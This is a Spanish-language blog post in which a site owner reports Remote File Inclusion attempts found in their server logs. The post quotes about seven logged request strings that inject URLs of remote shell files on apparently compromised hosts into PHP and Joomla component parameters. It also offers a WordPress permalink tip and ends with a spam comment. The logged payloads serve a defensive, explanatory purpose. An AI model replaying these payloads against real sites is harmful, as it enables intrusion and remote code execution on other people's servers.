"Auge de ataques RFI"
Es gracioso encontrarte a diario en el log del site bastantes intentos de incursiones RFI, consolas remotas… Basura variada para webs escritas en PHP que utilizan variables del tipo /?p=*** para intentar hacerse con una consola remota, sacar nuestro HASH, etc. Es una pena que éstos atáques no se realzien desde conexiones y pc domésticas, en éste caso son automatizados y desde servers remotos desde donde los atacantes relizan los actos, incluso desde webs que todavía no saben que su seguridad ha sido comprometida y que a su vez sirven para realizar ataques RFI.
Algunos de los códigos utilizados:
/?_SERVERDOCUMENT_ROOT=http://www.alst.ru/cmd??&u=x
/?cat=23%20%20//[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]=http://www.import-et-export.fr//components/com_virtuemart/rs1??
/?mosConfig.absolute.path=http://manihajar.fileave.com/id1.txt?
/?p=406//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? (Visitad su web, no tiene desperdicio)
/?p=298/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt????
/?cat=23//[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]=http://www.ambient-arts.co.uk/modules/id.txt???
/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt??
…
En WordPress, por ejemplo, podemos personalizar la estructura de la URL, la cual predeterminadamente es del tipo descrito arriba (www.misite/?p=100) el cual es un reclamo para millones de Script Kiddies aburridos. Éste pequeño cambio puede servir para disuadir del 90 al 99% de éstos Lusers (low-users y/o Lamers) para el 1% restante solo nos queda... apretar bién el culito. Lo dicho anteriormente, no ceséis en vuestros intentos, esi sí intentad utilizar métodos más sofisticados que los empleados hasta ahora, vuestras shells y Scaners RFI apestan, como vosotros 
Tagged with: hacking • rfi • vulnerabilidad
Fichero archivado: Vulnerabilidades • Web
Le gusto este articulo? Subscribete a mi RSS feed y obtener mas descargas!
There is evidently plenty to learn concerning this. I think you’ve made some great points. Also can you please tell me exactly where do i acquire a few neat wordpress themes? Respectfully, Windy.